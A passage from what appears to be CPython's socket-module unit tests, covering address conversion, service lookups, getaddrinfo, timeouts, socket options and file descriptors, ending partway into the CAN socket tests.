# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
